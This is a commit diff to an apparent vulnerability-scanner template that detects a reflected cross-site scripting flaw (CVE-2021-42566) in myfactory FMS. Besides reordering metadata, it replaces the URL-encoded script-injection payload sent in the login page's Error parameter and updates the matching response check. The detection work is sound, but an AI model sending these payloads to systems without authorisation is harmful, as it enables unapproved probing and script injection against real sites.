Update CVE-2021-42566.yaml

2021-10-29 00:22:29 +05:30 · 2021-10-29 00:22:29 +05:30 · 263fb400e9
parent ca73e75974
commit 263fb400e9
1 changed files with 10 additions and 9 deletions
--- a/cves/2021/CVE-2021-42566.yaml
+++ b/cves/2021/CVE-2021-42566.yaml
@ -1,25 +1,25 @@
 id: CVE-2021-42566

 info:
-  author: madrobot
  name: myfactory FMS  -  Reflected XSS
-  description: myfactory.FMS before 7.1-912 allows XSS via the Error parameter.
+  author: madrobot
  severity: medium
-  tags: cve,cve2021,myfactory,xss
+  description: myfactory.FMS before 7.1-912 allows XSS via the Error parameter.
  reference:
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566
    - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
    cve-id: CVE-2021-42566
    cwe-id: CWE-79
+  tags: cve,cve2021,myfactory,xss

 requests:
  - method: GET
    path:
-      - '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%27)%3Balert(1)%3B%2F%2F'
-      - '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%27)%3Balert(1)%3B%2F%2F'
+      - '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
@ -28,12 +28,13 @@ requests:
          - 200

      - type: word
-        words:
-          - ";alert(1);//"
        part: body
+        words:
+          - "</script><script>alert(document.domain)</script>"
        condition: and

      - type: word
+        part: header
        words:
          - "text/html"
-        part: header
+